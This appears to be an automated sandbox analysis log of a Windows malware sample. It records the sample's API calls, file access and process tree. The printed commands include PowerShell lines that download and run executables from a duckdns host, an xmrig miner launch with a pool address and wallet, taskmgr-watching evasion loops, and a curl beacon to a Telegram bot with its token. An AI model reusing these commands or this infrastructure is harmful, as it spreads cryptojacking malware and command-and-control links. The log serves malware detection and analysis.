Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2B40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DF900 FindFirstFileExA, 31_2_00007FF75C2DF900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C1304 VirtualQuery,GetSystemInfo, 0_2_00007FF7332C1304
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: curl.exe, 00000026.00000003.1704174076.0000020ECD734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP[[P
Source: xmrig.exe, 00000015.00000002.3899633075.000001CD415A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1528272772.00000237EBE30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1880092416.000001A3E3842000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000001B.00000002.1623996221.0000015ED19DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2118171144.000001DDC13EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7332C7338
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DCA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 27_2_00007FF7033DCA18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D0980 GetProcessHeap, 0_2_00007FF7332D0980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7332C7338
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7332C2170
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C2FB4 SetUnhandledExceptionFilter, 0_2_00007FF7332C2FB4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7332C2DD0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5732170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF6C5732170
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5737338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF6C5737338
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5732DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF6C5732DD0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5732FB4 SetUnhandledExceptionFilter, 6_2_00007FF6C5732FB4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FB2E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 27_2_00007FF7033FB2E0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FB798 SetUnhandledExceptionFilter, 27_2_00007FF7033FB798
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FB5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_00007FF7033FB5B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_00007FF75C2D2DD0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D2FB4 SetUnhandledExceptionFilter, 31_2_00007FF75C2D2FB4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_00007FF75C2D2170
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_00007FF75C2D7338
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Users\user\AppData\Roaming\6.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -outfile 'c:\users\user\appdata\roaming\6.exe'; c:\users\user\appdata\roaming\6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -outfile 'c:\users\user\appdata\roaming\1.exe'; c:\users\user\appdata\roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -outfile 'c:\users\user\appdata\roaming\2.exe'; c:\users\user\appdata\roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -outfile 'c:\users\user\appdata\roaming\6.exe'; c:\users\user\appdata\roaming\6.exe" Jump to behavior
